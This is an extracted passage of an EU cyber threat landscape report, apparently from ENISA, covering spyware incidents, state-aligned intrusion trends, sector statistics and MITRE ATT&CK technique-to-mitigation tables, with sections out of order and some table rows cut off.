In July 2024, German MEP Daniel Freund declared having been targeted by an attempt to deploy the Candiru spyware on his phone two weeks before elections for the EU Parliament310. Between December 2024 and February 2025, Pegasus spyware infections were identified, with victims in Czech Republic, Poland and Spain. Victimology reportedly included professionals in real estate, logistics and finance, as well as one European government official 311 312 313. Since the beginning of January 2025, open-source reports documenting the use of Graphite spyware through the exploitation of 0-day vulnerabilities in WhatsApp’s end-to-end encryption and a zero-click iMessage vulnerability tracked as CVE-2025-43200 emerged, reportedly targeting 90 individuals globally, including in at least 15 EU MSs314 315 316 317 318 319 320 321 322 323.

7.2 KEY STATE-ALIGNED TRENDS 7.2.1 Tactics, Techniques and Procedures (TTPs) This section provides an overview of Tactics, Techniques and Procedures leveraged by State-aligned intrusion sets, as well as reported toolset developments. These are thoroughly documented in the appendix. Most commonly seen TTPs leveraged across state-aligned intrusion sets include: • Spearphishing • Exploitation of public-facing services and use of default credentials • Execution via PowerShell, credential brute-forcing and USB-based attacks State-aligned intrusion sets continued updating and developing their toolsets to gain foothold and maintain stealth and persistent access to targeted information systems. Related key observations include: • Innovative physical-layer-adjacent access vectors: Nearest-Neighbour Wi-Fi and Air-Gap Targeting: APT28’s nearest neighbour Wi-Fi attack324 enabled network breaches from adjacent infrastructures without direct proximity, while GoldenJackal demonstrated infiltration of air-gapped systems via malicious USB drives. • Networking and infrastructure exploitation: Threat actors compromise core network devices through the exploitation of zero-day and n-day vulnerabilities, such as UNC3886 targeting Juniper routers and Velvet Ant exploiting Cisco NX-OS zero-days. • Continuous shifts in programming languages: Re-implementation of existing toolsets in new languages to evade detection and improve portability. GoldenJackal transitioned from C# to Go, while APT35’s Cyclops is a Go-based successor to BellaCiao. • Anti-detection and evasion mechanisms: Multiple toolsets incorporate sandbox detection, obfuscation or legitimate software abuse to avoid security controls. Examples include SnipBot’s anti-sandbox checks and Mustang Panda’s abuse of Microsoft processes for injection. • Expanded targeting of Linux systems: Linux systems, especially in infrastructure and cloud environments, are targeted by malware such as WolfsBane, FireWood, and POOLRAT. • In-Memory malware deployment: Adversaries increasingly execute payloads entirely in memory, as seen in BackdoorDiplomacy’s QSC framework and APT29’s GRAPELOADER.

7.2.2 EU as a target, and as a lure Over the reporting period, multiple state-nexus intrusion sets continued leveraging tailored lures impersonating EU institutions, officials and affiliated entities. These campaigns capitalised on the perceived legitimacy of EU branding, official communication styles, and references to policy-related events to increase the likelihood that recipients would engage with malicious content. This is notably illustrated by APT29 impersonating an EU Ministry of Foreign Affairs or referencing fictitious diplomatic events and cultural activities to target diplomatic staff in spearphishing campaigns, as well as mentioning ENISA in lure documents aimed at private companies. Similar examples include Callisto’s tailored phishing pages to mimic EU institutional correspondence325, Storm-2372 masquerading as a member of the European Parliament’s Committee on Foreign Affairs326, Laundry Bear’ spearphishing campaign posing as organisers of the European Defence & Security Summit in Brussels327, and UTA0352 and UTA0355 impersonating officials from EU Member States such as Romania and Bulgaria, and Ukraine’s diplomatic missions to the EU and NATO 328. Additional use of the EU brand was illustrated by Earth Preta, a subgroup of APT41, embedding malware in

With a total share of incidents amounting to 8.2%, targeting DIS in the EU shows a clear concentration of a few key intrusion sets, notably a stark dominance of operations linked to Russia-nexus intrusion sets, primarily driven by APT29121 and APT28. These intrusion sets account for the majority of observed incidents, with campaigns targeting IT service providers and telecommunications companies. DPRK-nexus malicious activities against this sector are largely skewed by Famous Chollima’s activities targeting IT providers and software developers in the EU122 123 , and the DeceptiveDevelopment campaign targeting freelance software developers124 125. In contrast, activity associated to China-nexus intrusion sets, notably Salt Typhoon, appears less frequently but concentrates on telecommunications infrastructure, with long running highly advanced campaigns, consistent with the broader global patterns of China-nexus cyberespionage126 127 128 129 130.

5.1 PUBLIC ADMINISTRATION As in the previous ETL, public administration remains the most targeted sector (38%), showing a significant increase, primarily due to hacktivist-led DDoS attacks. The highest number of recorded incidents reportedly impacted the public administration sector in France (27%), Italy (26.3%) and Germany (16.2%), followed by Spain (15.3%) and Poland (15.1%). The distribution of incidents affecting public administration over the reporting period shows that incidents primarily impacted regional (24.4 %) and central entities (15.1%).

Within the central entities category, defence and military related entities and intelligence and security services represented 2.4%, while law enforcement related bodies made up 0.9% and political parties represented around 0.1%. Diplomatic missions such as embassies accounted for 1.4%. Union entities and NATO Enterprise each contributed 0.7% of all incidents. 1% of recorded DDoS attacks targeting the websites of EU organisations were related to non-EU countries, namely Iranian or Israeli organisations. Unsurprisingly, this threat picture is largely impacted by hacktivist-led DDoS (96.2%) attacks, with the targeting of public administration websites being the first-line option around specific events, such as takedowns and arrests, electoral processes or high visibility events107, as illustrated with a few contextualised examples hereunder.

Hacktivist groups NoName057(16) (66.7%), Dark Storm (20%), and Keymous+ (13.3%) were the most active intrusion sets targeting public administration in the EU. Alliances such as 7 October Union and Holy League contributed to the increasing tempo and intensity of DDoS attacks targeting the websites and portals of public administrations in EU MSs, in the context of Russia’s war of aggression against Ukraine, as well as the Israel-Hamas conflict. Other claims made by these alliances also pertained to societal issues, including EU migration policies, LGBTQ+ legislation, or perceived anti-religious stances.

5. SECTORIAL ANALYSIS This section examines cyber threats from a sectorial perspective. While it includes the 18 sectors identified under the NIS2 Directive as high‑criticality or other critical, our analysis extends beyond these to consider a broader range of sectors. In our analysis, particular emphasis is placed on the five most targeted sectors to highlight key threat patterns. Over the reporting period, ENISA collected and curated 4 875 events. 28.5% of the total number of incidents were not associated to a specific sector, either because the sector was not properly documented (i.e., private sector, private companies) or not mentioned at all. Once this significant share is redacted, the top five targeted sectors in the EU include public administration (38.2%), transport (7.5%), digital infrastructure and services (4.8%), finance (4.5%) and manufacturing (2.9%). While recorded incidents include non-NIS2 sectors, the close alignment of the top five targeted sectors with sectors explicitly covered under the directive confirms the relevance of the NIS2 approach106, as essential entities represent 53.7% of the total number of recorded incidents.

While public administration, transport and finance were already listed as the top targeted sectors of EU MSs in the previous reporting period, incidents targeting public administration substantially increased, notably due to the increase of hacktivist-led DDoS attacks against this sector. Overall, DDoS attacks were the most prevalent threat and affected multiple sectors in the EU (81.4%).

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

When considering the attack surface, 64% of documented vulnerabilities use the network as the attack vector, in accordance with the definition of the CVSS Attack vector metric486. This underscores the potential risk of remote exploitation, especially for Internet-facing systems.

Based on the Common Weakness Enumeration (CWE) list, 2024 most commonly saw the following top 25 weaknesses in hardware and software, that could have security ramifications. Fig. 45, Top 25 commonly seen CWEs. Source : CWE list

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

M1012: Enterprise Policy, M1011: User Guidance, M1013: Application Developer Guidance

M1054: Software Configuration, M1021: Restrict Web-Based Content, M1047: Audit, M1018: User Account Management, M1017: User Training, M1031: Network Intrusion Prevention, M1049: Antivirus/Antimalware

M1026: Privileged Account Management, M1040: Behaviour Prevention on Endpoint, M1022: Restrict File and Directory Permissions, M1018: User Account Management

MITRE ATT&CK Mobile TTPs identified for RATs reportedly seen in the EU Tactic

M1012: Enterprise Policy, M1011: User Guidance, M1006: Use Recent OS Version

M1006: Use Recent OS Version, M1012: Enterprise Policy, M1011: User Guidance

Concepts and frameworks used to document vulnerabilities: CVE Numbering Authority493: An authorised entity with specific scope and responsibility to regularly assign CVE IDs and publish corresponding CVE Records. ENISA is a CVE Numbering Authority. CVE Identifier: The CVE494 (Common Vulnerabilities and Exposures) programme is an international, community-driven effort to identify and catalogue publicly disclosed vulnerabilities. Each disclosed vulnerability is catalogued within a CVE Record, which includes information about the vulnerability, and is assigned an alphanumeric string that identifies a publicly disclosed vulnerability, called a CVE Identifier (ID). Individual CVE Records are catalogued via the list of CVEs. EUVD Identifier: Similar to CVE, ENISA assigns and records a unique identifier to each publicly disclosed vulnerability which is catalogued within the EU Vulnerability Database. CVSS: Common Vulnerability Scoring System495, is an open framework for communicating the characteristics and severity of vulnerabilities. In the current version (4.0) it uses 4 metrics with numbers between 0 and 10. CVSS adopts the following severity rating based on the score:

CWE: The Common Weakness Enumeration496 is a community-developed list of common software and hardware weakness types that could have security ramifications. A weakness is a condition in a software, firmware, hardware or service component that, under certain circumstances, could contribute to the introduction of vulnerabilities. A CWE is assigned an ID. In many cases, a CWE ID is included in a vulnerability description to enrich the information. This information helps developers to understand common weakness and improve secure development practices.

M1017: User Training, M1018: User Account Management

MITRE ATT&CK Enterprise TTPs identified for ransomware reportedly seen in the EU Tactic

M1041: Encrypt Sensitive Information, M1040: Behaviour Prevention on Endpoint, M1027: Password Policies, M1017: User Training, M1026: Privileged Account Management, M1025: Privileged Process Integrity, M1043: Credential Access Protection, M1015: Active Directory Configuration, M1028: Operating System Configuration

M1028: Operating System Configuration, M1043: Credential Access Protection, M1025: Privileged Process Integrity, M1026: Privileged Account Management, M1017: User Training, M1040: Behaviour Prevention on Endpoint, M1027: Password Policies, M1041: Encrypt Sensitive Information, M1015: Active Directory Configuration

M1028: Operating System Configuration

MITRE ATT&CK Enterprise TTPs identified for loaders reportedly seen in the EU Tactic

M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training, M1049: Antivirus/Antimalware

M1041: Encrypt Sensitive Information, M1029: Remote Data Storage, M1022: Restrict File and Directory Permissions

M1038: Execution Prevention, M1040: Behaviour Prevention on Endpoint, M1017: User Training, M1021: Restrict Web-Based Content, M1031: Network Intrusion Prevention

M1040: Behaviour Prevention on Endpoint, M1028: Operating System Configuration, M1047: Audit, M1045: Code Signing, M1018: User Account Management, M1033: Limit Software Installation, M1026: Privileged Account Management, M1054: Software Configuration, M1022: Restrict File and Directory Permissions

M1031: Network Intrusion Prevention, M1037: Filter Network Traffic

M1022: Restrict File and Directory Permissions, M1029: Remote Data Storage, M1041: Encrypt Sensitive Information

M1041: Encrypt Sensitive Information, M1029: Remote Data Storage, M1022: Restrict File and Directory Permissions

M1018: User Account Management, M1015: Active Directory Configuration, M1051: Update Software, M1026: Privileged Account Management, M1027: Password Policies, M1033: Limit Software Installation, M1030: Network Segmentation, M1017: User Training, M1032: Multi-factor Authentication, M1029: Remote Data Storage

M1027: Password Policies, M1018: User Account Management, M1026: Privileged Account Management, M1032: Multi-factor Authentication, M1013: Application Developer Guidance, M1017: User Training, M1015: Active Directory Configuration, M1036: Account Use Policies

M1018: User Account Management, M1032: Multi-factor Authentication, M1026: Privileged Account Management, M1017: User Training, M1027: Password Policies, M1013:

M1031: Network Intrusion Prevention

M1041: Encrypt Sensitive Information, M1040: Behaviour Prevention on Endpoint, M1027: Password Policies, M1017: User Training, M1026: Privileged Account Management, M1025: Privileged Process Integrity, M1043: Credential Access Protection, M1015: Active Directory Configuration, M1028: Operating System Configuration

M1028: Operating System Configuration, M1043: Credential Access Protection, M1025: Privileged Process Integrity, M1026: Privileged Account Management, M1017: User Training, M1040: Behaviour Prevention on Endpoint, M1027: Password Policies, M1041: Encrypt Sensitive Information, M1015: Active Directory Configuration

M1027: Password Policies, M1026: Privileged Account Management, M1017: User Training, M1041: Encrypt Sensitive Information, M1040: Behaviour Prevention on Endpoint, M1025: Privileged Process Integrity, M1043: Credential Access Protection, M1015:

Mitigation Application Developer Guidance, M1015: Active Directory Configuration, M1036: Account Use Policies

M1026: Privileged Account Management, M1032: Multi-factor Authentication, M1027: Password Policies, M1018: User Account Management, M1013: Application Developer Guidance, M1017: User Training, M1015: Active Directory Configuration, M1036: Account Use Policies

M1031: Network Intrusion Prevention, M1047: Audit, M1037: Filter Network Traffic, M1030: Network Segmentation

M1018: User Account Management, M1036: Account Use Policies, M1032: Multi-factor Authentication, M1027: Password Policies

M1030: Network Segmentation, M1042: Disable or Remove Feature or Program, M1035: Limit Access to Resource Over Network, M1032: Multi-factor Authentication

M1037: Filter Network Traffic, M1031: Network Intrusion Prevention

M1049: Antivirus/Antimalware, M1018: User Account Management, M1047: Audit, M1031: Network Intrusion Prevention, M1054: Software Configuration, M1017: User Training, M1021: Restrict Web-Based Content

M1054: Software Configuration, M1021: Restrict Web-Based Content, M1047: Audit, M1018: User Account Management, M1017: User Training, M1031: Network Intrusion Prevention, M1049: Antivirus/Antimalware

M1026: Privileged Account Management, M1040: Behaviour Prevention on Endpoint, M1022: Restrict File and Directory Permissions, M1018: User Account Management

M1052: User Account Control, M1040: Behaviour Prevention on Endpoint, M1044: Restrict Library Loading, M1047: Audit, M1013: Application Developer Guidance, M1018: User Account Management, M1051: Update Software, M1038: Execution Prevention, M1022: Restrict File and Directory Permissions, M1024: Restrict Registry Permissions

M1049: Antivirus/Antimalware, M1018: User Account Management, M1047: Audit, M1031: Network Intrusion Prevention, M1054: Software Configuration, M1017: User Training, M1021: Restrict Web-Based Content

M1038: Execution Prevention, M1044: Restrict Library Loading, M1051: Update Software, M1047: Audit, M1013: Application Developer Guidance, M1052: User Account Control, M1040: Behaviour Prevention on Endpoint, M1018: User Account Management, M1022: Restrict File and Directory Permissions, M1024: Restrict Registry Permissions

M1052: User Account Control, M1040: Behaviour Prevention on Endpoint, M1044: Restrict Library Loading, M1047: Audit, M1013: Application Developer Guidance, M1018: User Account Management, M1051: Update Software, M1038: Execution Prevention, M1022: Restrict File and Directory Permissions, M1024: Restrict Registry Permissions

MITRE ATT&CK Enterprise TTPs identified for RATs reportedly seen in the EU Tactic

Missing Authentication for Critical Function

Improper Control of Generation of Code ('Code Injection') Improper Input Validation Improper Neutralization of Special Elements used in a Command ('Command Injection')

Improper Restriction of Operations within the Bounds of a Memory Buffer

The top 20 vendors whose solutions were reported as vulnerable accounted for 29% of all newly disclosed documented vulnerabilities over the reporting period, with top three vendors with the highest count of vulnerabilities disclosed as high and critical being Microsoft, Adobe, and Qualcomm Inc.

It should be noted that this distribution is likely to be inflated by CVE assignment policies, as is the case for Linux-related vulnerabilities, which also include bug fixes487.

Mitigation M1040: Behaviour Prevention on Endpoint

M1033: Limit Software Installation, M1045: Code Signing, M1042: Disable or Remove Feature or Program, M1038: Execution Prevention, M1049: Antivirus/Antimalware, M1026: Privileged Account Management, M1047: Audit, M1021: Restrict Web-Based Content,

M1042: Disable or Remove Feature or Program, M1049: Antivirus/Antimalware, M1045: Code Signing, M1026: Privileged Account Management, M1038: Execution Prevention, M1033: Limit Software Installation, M1047: Audit, M1021: Restrict Web-Based Content, M1040: Behaviour Prevention on Endpoint

M1038: Execution Prevention, M1033: Limit Software Installation, M1045: Code Signing, M1042: Disable or Remove Feature or Program, M1049: Antivirus/Antimalware, M1026: Privileged Account Management, M1047: Audit, M1021: Restrict Web-Based Content, M1040: Behaviour Prevention on Endpoint

M1042: Disable or Remove Feature or Program, M1049: Antivirus/Antimalware, M1038: Execution Prevention, M1040: Behaviour Prevention on Endpoint, M1021: Restrict Web-Based Content, M1033: Limit Software Installation, M1045: Code Signing, M1026: Privileged Account Management, M1047: Audit

OBSERVED TACTICS, TECHNIQUES & PROCEDURES (TTPS)

TTPs describe how adversaries operate, with Tactics describing their objectives, Techniques documenting the general methods they use and Procedures detailing the specific steps or tools they employ. Based on opensource reports, ENISA’s dataset focuses heavily on post-compromise activities, particularly reconnaissance conducted by adversaries and methods to maintain access or execute malicious payloads after initial intrusion. Documented tactics associated with TA0040: Impact, TA0010: Exfiltration and TA0009: Collection are less frequent. At the technique level, the dataset highlights the recurring tradecraft of adversaries around specific tactics. Figure 42 represents a clustered visualisation of common TTPs based on ENISA’s dataset.

T1027: Obfuscated Files or Information

M1047: Audit, M1035: Limit Access to Resource Over Network, M1030: Network Segmentation, M1028: Operating System Configuration, M1042: Disable or Remove Feature or Program, M1018: User Account Management, M1032: Multi-factor Authentication, M1026: Privileged Account Management, M1027: Password Policies

M1042: Disable or Remove Feature or Program, M1032: Multi-factor Authentication, M1018: User Account Management, M1035: Limit Access to Resource Over Network, M1047: Audit, M1027: Password Policies

M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training, M1049: Antivirus/Antimalware

M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training, M1049: Antivirus/Antimalware

M1049: Antivirus/Antimalware, M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training

M1047: Audit, M1018: User Account Management, M1017: User Training, M1045: Code Signing, M1040: Behaviour Prevention on Endpoint, M1022: Restrict File and Directory Permissions, M1049: Antivirus/Antimalware, M1038: Execution Prevention

M1047: Audit, M1035: Limit Access to Resource Over Network, M1030: Network Segmentation, M1028: Operating System Configuration, M1042: Disable or Remove Feature or Program, M1018: User Account Management, M1032: Multi-factor Authentication, M1026: Privileged Account Management, M1027: Password Policies

M1026: Privileged Account Management, M1035: Limit Access to Resource Over Network, M1037: Filter Network Traffic, M1027: Password Policies, M1047: Audit, M1018: User Account Management, M1042: Disable

M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training, M1049: Antivirus/Antimalware

M1049: Antivirus/Antimalware, M1047: Audit, M1040: Behaviour Prevention on Endpoint, M1017: User Training

M1049: Antivirus/Antimalware, M1040: Behaviour Prevention on Endpoint, M1047: Audit, M1017: User Training

T1047: Windows Management Instrumentation

M1047: Audit, M1018: User Account Management, M1017: User Training, M1045: Code Signing, M1040: Behaviour Prevention on Endpoint, M1022: Restrict File and Directory Permissions, M1049: Antivirus/Antimalware, M1038: Execution Prevention

M1042: Disable or Remove Feature or Program, M1028: Operating System Configuration

M1022: Restrict File and Directory Permissions, M1038: Execution Prevention, M1045: Code Signing, M1047: Audit, M1018: User Account Management, M1017: User Training, M1040: Behaviour Prevention on Endpoint, M1049: Antivirus/Antimalware

M1042: Disable or Remove Feature or Program, M1031: Network Intrusion Prevention, M1030: Network Segmentation

M1026: Privileged Account Management, M1040: Behaviour Prevention on Endpoint, M1018: User Account Management, M1038: Execution Prevention

T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol

M1022: Restrict File and Directory Permissions, M1038: Execution Prevention, M1045: Code Signing, M1047: Audit, M1018: User Account Management, M1017: User Training, M1040: Behaviour Prevention on Endpoint, M1049: Antivirus/Antimalware

M1042: Disable or Remove Feature or Program, M1031: Network Intrusion Prevention, M1030: Network Segmentation

M1026: Privileged Account Management, M1040: Behaviour Prevention on Endpoint, M1018: User Account Management, M1038: Execution Prevention

M1031: Network Intrusion Prevention, M1030: Network Segmentation, M1037: Filter Network Traffic, M1057: Data Loss Prevention, M1022: Restrict File and Directory Permissions, M1018: User Account Management

M1031: Network Intrusion Prevention, M1057: Data Loss Prevention, M1037: Filter Network Traffic, M1030: Network Segmentation, M1022: Restrict File and Directory Permissions, M1018: User Account Management

T1048: Exfiltration Over Alternative Protocol

M1030: Network Segmentation, M1057: Data Loss Prevention, M1037: Filter Network Traffic, M1031: Network Intrusion Prevention, M1022: Restrict File and Directory Permissions, M1018: User Account Management

M1042: Disable or Remove Feature or Program, M1034: Limit Hardware Installation, M1057: Data Loss Prevention

M1018: User Account Management, M1028: Operating System Configuration, M1022: Restrict File and Directory Permissions, M1026: Privileged Account Management, M1047: Audit

M1018: User Account Management, M1028: Operating System Configuration, M1022: Restrict File and Directory Permissions, M1026: Privileged Account Management, M1047: Audit

M1026: Privileged Account Management, M1018: User Account Management, M1047: Audit, M1028: Operating System Configuration, M1022: Restrict File and Directory Permissions

M1026: Privileged Account Management, M1018: User Account Management, M1047: Audit, M1028: Operating System Configuration, M1022: Restrict File and Directory Permissions

T1059: Command and Scripting Interpreter

M1033: Limit Software Installation, M1045: Code Signing, M1042: Disable or Remove Feature or Program, M1038: Execution Prevention, M1049: Antivirus/Antimalware, M1026: Privileged Account Management, M1047: Audit, M1021: Restrict Web-Based Content, M1040: Behaviour Prevention on Endpoint

M1042: Disable or Remove Feature or Program, M1049: Antivirus/Antimalware, M1045: Code Signing, M1026: Privileged Account Management, M1038: Execution Prevention, M1033: Limit Software Installation, M1047: Audit, M1021: Restrict Web-Based Content, M1040: Behaviour Prevention on Endpoint

M1038: Execution Prevention, M1033: Limit Software Installation, M1045: Code Signing, M1042: Disable or Remove Feature or Program, M1049: Antivirus/Antimalware, M1026: Privileged Account Management, M1047: Audit, M1021: Restrict Web-Based Content, M1040: Behaviour Prevention on Endpoint

M1042: Disable or Remove Feature or Program, M1049: Antivirus/Antimalware, M1038: Execution Prevention, M1040: Behaviour Prevention on Endpoint, M1021: Restrict Web-Based Content, M1033: Limit Software Installation, M1045: Code Signing, M1026: Privileged Account Management, M1047: Audit

T1190: Exploit Public-Facing Application

M1030: Network Segmentation, M1028: Operating System Configuration, M1032: Multi-factor Authentication, M1026: Privileged Account Management

M1050: Exploit Protection, M1051: Update Software, M1048: Application Isolation and Sandboxing, M1021: Restrict Web-Based Content, M1017: User Training

M1048: Application Isolation and Sandboxing, M1030: Network Segmentation, M1016: Vulnerability Scanning, M1026: Privileged Account Management, M1050: Exploit Protection, M1035: Limit Access to Resource Over Network, M1051: Update Software

M1038: Execution Prevention, M1042: Disable or Remove Feature or Program, M1050: Exploit Protection, M1037: Filter Network Traffic, M1026: Privileged Account Management, M1021: Restrict Web-Based Content

M1038: Execution Prevention, M1037: Filter Network Traffic, M1034: Limit Hardware Installation, M1031: Network Intrusion Prevention, M1042: Disable or Remove Feature or Program

M1018: User Account Management, M1036: Account Use Policies, M1032: Multi-factor Authentication, M1027: Password Policies

M1030: Network Segmentation, M1042: Disable or Remove Feature or Program, M1035: Limit Access to Resource Over Network, M1032: Multi-factor Authentication

M1017: User Training, M1038: Execution Prevention, M1040: Behaviour Prevention on Endpoint, M1021: Restrict Web-Based Content, M1031: Network Intrusion Prevention

M1031: Network Intrusion Prevention, M1017: User Training, M1021: Restrict Web-Based Content, M1038: Execution

M1048: Application Isolation and Sandboxing, M1030: Network Segmentation, M1016: Vulnerability Scanning, M1026: Privileged Account Management, M1050: Exploit Protection, M1035: Limit Access to Resource Over Network, M1051: Update Software

T1211: Exploitation for Defence Evasion

M1038: Execution Prevention, M1040: Behaviour Prevention on Endpoint, M1017: User Training, M1021: Restrict Web-Based Content, M1031: Network Intrusion Prevention

M1050: Exploit Protection, M1051: Update Software, M1019: Threat Intelligence Program, M1048: Application Isolation and Sandboxing

M1047: Audit, M1018: User Account Management, M1017: User Training, M1032: Multi-factor Authentication, M1060: Out-of-Band Communications Channel, M1054: Software Configuration, M1041: Encrypt Sensitive Information

M1042: Disable or Remove Feature or Program, M1026: Privileged Account Management, M1050: Exploit Protection, M1037: Filter Network Traffic, M1038: Execution Prevention, M1021: Restrict Web-Based Content

M1038: Execution Prevention, M1037: Filter Network Traffic, M1034: Limit Hardware Installation, M1031: Network Intrusion Prevention, M1042: Disable or Remove Feature or Program

T1537: Transfer Data to Cloud Account

M1030: Network Segmentation, M1018: User Account Management, M1060: Outof-Band Communications Channel, M1024: Restrict Registry Permissions, M1022: Restrict File and Directory Permissions

M1038: Execution Prevention, M1028: Operating System Configuration, M1018: User Account Management, M1053: Data Backup

M1057: Data Loss Prevention, M1018: User Account Management, M1054: Software Configuration, M1037: Filter Network Traffic

M1040: Behaviour Prevention on Endpoint, M1028: Operating System Configuration, M1047: Audit, M1045: Code Signing, M1018: User Account Management, M1033: Limit Software Installation, M1026: Privileged Account Management, M1054: Software Configuration, M1022: Restrict File and Directory Permissions

T1548.002: Bypass User Account Control

Mitigation Control, M1026: Privileged Account Management, M1018: User Account Management, M1047: Audit, M1022: Restrict File and Directory Permissions

M1051: Update Software, M1047: Audit, M1052: User Account Control, M1026: Privileged Account Management, M1038: Execution Prevention, M1028: Operating System Configuration, M1018: User Account Management, M1022: Restrict File and Directory Permissions

M1041: Encrypt Sensitive Information, M1051: Update Software, M1017: User Training, M1015: Active Directory Configuration, M1027: Password Policies, M1028: Operating System Configuration, M1037: Filter Network Traffic, M1022: Restrict File and Directory Permissions, M1035: Limit Access to Resource Over Network, M1047: Audit, M1026: Privileged Account Management

M1038: Execution Prevention, M1028: Operating System Configuration, M1026: Privileged Account Management, M1024: Restrict Registry Permissions, M1054: Software Configuration

T1548: Abuse Elevation Control Mechanism

M1030: Network Segmentation, M1018: User Account Management, M1060: Outof-Band Communications Channel, M1024: Restrict Registry Permissions, M1022: Restrict File and Directory Permissions

M1038: Execution Prevention, M1028: Operating System Configuration, M1018: User Account Management, M1053: Data Backup

M1040: Behaviour Prevention on Endpoint, M1028: Operating System Configuration, M1047: Audit, M1045: Code Signing, M1018: User Account Management, M1033: Limit Software Installation, M1026: Privileged Account Management, M1054: Software Configuration, M1022: Restrict File and Directory Permissions

M1038: Execution Prevention, M1028: Operating System Configuration, M1051: Update Software, M1052: User Account

T1555.003: Credentials from Web Browsers

M1038: Execution Prevention, M1028: Operating System Configuration, M1051: Update Software, M1052: User Account Control, M1026: Privileged Account Management, M1018: User Account Management, M1047: Audit, M1022: Restrict File and Directory Permissions

M1051: Update Software, M1047: Audit, M1052: User Account Control, M1026: Privileged Account Management, M1038: Execution Prevention, M1028: Operating System Configuration, M1018: User Account Management, M1022: Restrict File and Directory Permissions

M1051: Update Software, M1018: User Account Management, M1017: User Training, M1021: Restrict Web-Based Content, M1027: Password Policies, M1026: Privileged Account Management

M1038: Execution Prevention, M1024: Restrict Registry Permissions, M1018: User Account Management, M1022: Restrict File and Directory Permissions, M1047: Audit, M1054: Software Configuration, M1042: Disable or Remove Feature or Program

T1562.004: Disable or Modify System Firewall

M1015: Active Directory Configuration, M1043: Credential Access Protection, M1041: Encrypt Sensitive Information, M1027: Password Policies, M1047: Audit, M1026: Privileged Account Management

M1054: Software Configuration, M1018: User Account Management, M1038: Execution Prevention, M1022: Restrict File and Directory Permissions, M1024: Restrict Registry Permissions, M1047: Audit, M1042: Disable or Remove Feature or Program

M1038: Execution Prevention, M1024: Restrict Registry Permissions, M1018: User Account Management, M1022: Restrict File and Directory Permissions, M1047: Audit, M1054: Software Configuration, M1042: Disable or Remove Feature or Program

M1047: Audit, M1018: User Account Management, M1024: Restrict Registry Permissions, M1022: Restrict File and Directory Permissions, M1054: Software Configuration, M1038: Execution Prevention, M1042: Disable or Remove Feature or Program

T1564.001: Hidden Files and Directories

Mitigation Management, M1038: Execution Prevention, M1022: Restrict File and Directory Permissions, M1024: Restrict Registry Permissions, M1047: Audit, M1042: Disable or Remove Feature or Program

M1033: Limit Software Installation, M1013: Application Developer Guidance, M1047: Audit, M1049: Antivirus/Antimalware

M1033: Limit Software Installation, M1013: Application Developer Guidance, M1047: Audit, M1049: Antivirus/Antimalware

M1038: Execution Prevention, M1033: Limit Software Installation, M1013: Application Developer Guidance, M1047: Audit, M1049: Antivirus/Antimalware

M1047: Audit, M1031: Network Intrusion Prevention, M1054: Software Configuration, M1021: Restrict WebBased Content, M1049: Antivirus/Antimalware, M1017: User Training

T1566.001: Spearphishing Attachment

M1047: Audit, M1018: User Account Management, M1024: Restrict Registry Permissions, M1022: Restrict File and Directory Permissions, M1054: Software Configuration, M1038: Execution Prevention, M1042: Disable or Remove Feature or Program

M1026: Privileged Account Management, M1054: Software Configuration, M1018: User Account Management, M1038: Execution Prevention, M1022: Restrict File and Directory Permissions, M1024: Restrict Registry Permissions, M1047: Audit, M1042: Disable or Remove Feature or Program

M1047: Audit, M1031: Network Intrusion Prevention, M1054: Software Configuration, M1021: Restrict WebBased Content, M1049: Antivirus/Antimalware, M1017: User Training

M1049: Antivirus/Antimalware, M1018: User Account Management, M1047: Audit, M1031: Network Intrusion Prevention, M1054: Software Configuration, M1017: User Training, M1021: Restrict Web-Based Content